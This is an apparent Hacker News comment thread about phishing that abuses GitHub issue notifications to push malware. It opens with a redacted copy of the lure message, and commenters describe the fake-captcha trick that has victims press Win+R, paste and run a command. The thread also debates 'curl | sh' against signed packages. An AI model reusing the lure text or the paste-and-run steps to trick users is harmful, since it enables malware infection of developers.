Try this, I think it will fix your issue (install GCC if you need a compiler): (Bitly link redirecting to zip file on mediafire) Pass: (something)

GitHub processed my abuse report within an hour and removed all posts by that user.


OMG! I was getting similar GitHub notification emails, saying detected vulnerability in your repo, but never figured it out as fake before this news, anyway I never clicked because I'm a lazy programmer :), once it's written it's written I do rewrite the code but don't find bugs and fix in my code. :D


The GitHub security alert digest[1] is a real thing. It's a feature of GitHub where they report security vulnerabilities in your project's dependencies. For example, if you use python and you have specified requests library in your requirements.txt, GitHub will send you emails about disclosed vulnerabilities in that library, urging you to upgrade to a higher version where it's fixed.

[1] https://docs.github.com/en/code-security/dependabot/dependab...


I don't understand whats special about this particular attack!>:( When I read the title I thought some automated GitHub emails were forged to sneakily point to a fake GitHub site or something. An obvious (for tech-savvy users) link pointing to an obvious malware (please copy and execute this code to solve the captcha.) If the people you are targeting fall for this why not send an old fashioned spam email with fake headers or via some hacked Wordpress installation? I guess using GitHub notifications is creative but in the end not much different than like sending a facebook message with a fake link, and the user getting an email notification with the message? The analysis of the malware once downloaded was certainly interesting, though!:)


Seriously how hard it can be for GH to detect that a randomly just created account is creating issues, with the same text, containing a link inside?

I got dozens of such spam during a whole day.


Once they introduce that, the texts will become more varied, and links, possibly, too.

There are more possible next steps, which would make creating accounts for spamming more expensive, but they will also inconvenience well-meaning new users.

I suspect that unless the problem of malicious spam from GitHub comments becomes rather serious, acting on the case by case basis may be the correct solution.


> Once they introduce that, the texts will become more varied

I’ve said for some time that, while LLMs are varying levels of useful for a lot of people, it’s practically tailor made for spam and phishing. I can’t think of any “product-market-fit” as good as that.

For instance: Imagine combining a leak of personal data from your favorite data broker (who knew that this would come back and bite), with an LLM to bypass spam filters and perform phishing attacks with eerie believable social engineering behind it. All for next to no money.


It's quite sad that in 2024 we still have people falling for the simplest tricks.

This is almost as easy as it was to call someone and asking them for the number of the modem on their desk and their logins back in the bad old days.

Considering the target platform I'm not overly surprised though.


It's quite sad that in 2024 that HN commenters still blame the victim, especially when the original author does a great job suggesting small changes that Microsoft can make to make their products safer for their users.


I turned off most GitHub emails and mostly use the Notification Centre for discovering things I need to know about. It's not entirely proof against phishing this way, but it doesn't get to use email to appear more legitimate.


An excellent slashvertisement for Virus Total. Wrapped in an important cautionary tale about how GitHub issues can be manipulated to try to spread malware.


This has happened for a while. In February of this year, the same attack vector was used in an attack to trick developers into thinking that they'd got a job offer from GitHub: https://www.xorlab.com/en/blog/phishing-on-github


It's worth checking every link you get even if it's from a trusted source, like GitHub... and to be able to restore the data, it's worth having a backup

Months ago I got crypto ads through a similar approach, some fake new account @-ing hundreds of users in an issue and then the issue is removed. The net effect is that the ads become unblockable in your email box (It's from GitHub!).

Maybe devs' target value in general has growing to a point where the openness of the system is more of a vulnerability than service.


> In text form (link altered for your safety)

Might want to change the image too, macOS recognises the link in that and makes it clickable. I’d say that’s more dangerous than modifying it in the text of the post, you could just as well include a non-clickable text link.


One one hand, I can see the captcha is easy to fall for. On the other, nothing says "prove you aren't a machine" like "run this code that a machine could easily run."


While we're here: what happened to the GitHub explore newsletter? I really enjoyed this, but I've stopped receiving it for a few months now. And I don't think I unsubscribed.


I've also been seeing Typeform emails coming from spam sources. Somehow people are using Typeform's positive reputation score to send emails to arbitrary emails.


Nice writeup! It reminded me a bit of Julia Evans' blog in terms of content (learning by teaching).


>verification steps >winkey+R >Ctrl+V >enter

Of all things that seem legit, this seems the legitest.


Fun how Microsoft is on both ends of the "exploit"


Not hijacked. Faked.


If your method of infecting your victim is having them paste and run a random command on their terminal, software developers is probably the worst group of people to be targeting.


“Curl pipe sh” would like to have a word…

I think you are painting with a broad brush.


This is no different from installing a random package through a package manager. If you're running "curl pipe sh" because an email told you to, that's on you.


No it isn't. Package managers verify the cryptographically signed package. That means the package can be built on a secure server, and then if a mirror becomes malicious or gets compromised, the malicious package won't have a valid signature so the package will not be installed. Running curl and piping it into sh means that not only could a malicious mirror or compromised server execute anything they want on your computer, but they could even send a different script when you curl it into sh vs when you view it any other way, making it much harder to detect[0].

[0] https://web.archive.org/web/20240213030202/https://www.idont...


I think the npm repos would like to have a word with you. Sure glad we've never had a cryptographically signed malicious package delivered via npm install


Thats like not wearing a seatbelt because you can still be crushed by a truck. Don't let perfect be the enemy of good. Package managers prevent some attacks that are possible via curl | sh. Some other attacks are still possible. It is still better than not cryptographically verifying the package.


That's like moving the goal posts so you can still try to have a point after the fact. Your comment suggested that package manager was secure while curl | sh isn't because the package manager won't have a valid signature. That's only if the package manager was compromised. A code package that is built to be malicious will still get signed by your manager. Only now, people think they are secure because it was signed.


No it wasn't. The comment I replied to claimed:

> This is no different from installing a random package through a package manager

I replied "No it isn't" in response to that, so I was claiming that a package manager was different (in terms of security) from doing curl | sh.

My comment then went on to explain specific attacks (a mirror being compromised) which are solved by package managers / cryptographic signatures.

At no point did I ever claim package managers were immune to all attacks. A compromised build server, leaked keys, or the upstream program thats being packaged being malicious are all still possible.

Its very simple, my Arch Linux install is pointed at the MIT mirrors. What is stopping the Massachusetts Institute of Technology from replacing my next firefox update with a virus? Cryptographic signatures. They don't have an Arch Linux signing key. What would be stopping them if I installed firefox by doing curl | sh? Nothing.


Couldn't I just publish a package? Then there's malware on the package manager wohooo


The tremendous number of attacks delivered via trusted package repos versus the number of widespread attacks via curl | sh (probably roughly zero) means that, theories aside, one of these is far more commonly abused than the other.


Both are examples of developer-types doing risky things, which was my point and also supports my point that developers are not exclusively better secured than non-developer types.


You just need a handful of people to fall for it, and a population of a hundred million daily active users on GitHub means there are always a handful of people to trick.


you'd be surprised at the quality of the average dev


My only encounter with this is, that I am annoyed if I open web dev tools on a new browser profile/guest profile, but am interrupted in my workflow because first I have to type "allow pasting" every single time. (Why I do this quite often? To be sure to have a clean state when debugging a web app) And all this, because some people cannot think, before they follow obscure instructions send to them by a untrusted party?

Why can't we have nice things again? Because of abusers yes, but also because of sheep people.


Hard disagree. Developers aren't magically tech wizards, many of them will struggle to install a printer. I've seen one spend fifteen minutes on adding a keyboard layout in Windows last week (granted, the process was very unintuitive).

It's this "I'm a developer, I'm too smart to fall for phishing" mindset that makes developers an excellent target for malware.


No org is safe, not even Github..


so many red-flags, i don't know how someone could go beyond and click this link.


These hackers need to work on the rest of their funnel lmao. Getting me to click the link would be easy, but running that script? Never in a million years!


woah


If you're stupid enough to paste something off a random website (that you discovered through a random email link) into the command line (and then execute it), then you deserve what happens next. At some point the end user is to blame.

I also have no clue why any reasonable person would refer to that monstrosity as a CAPTCHA.


This is neither hijacking notifications nor sending malware. This is someone including a link in a message on a ticketing system open to the public, and then someone clicking on the link and downloading malware.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: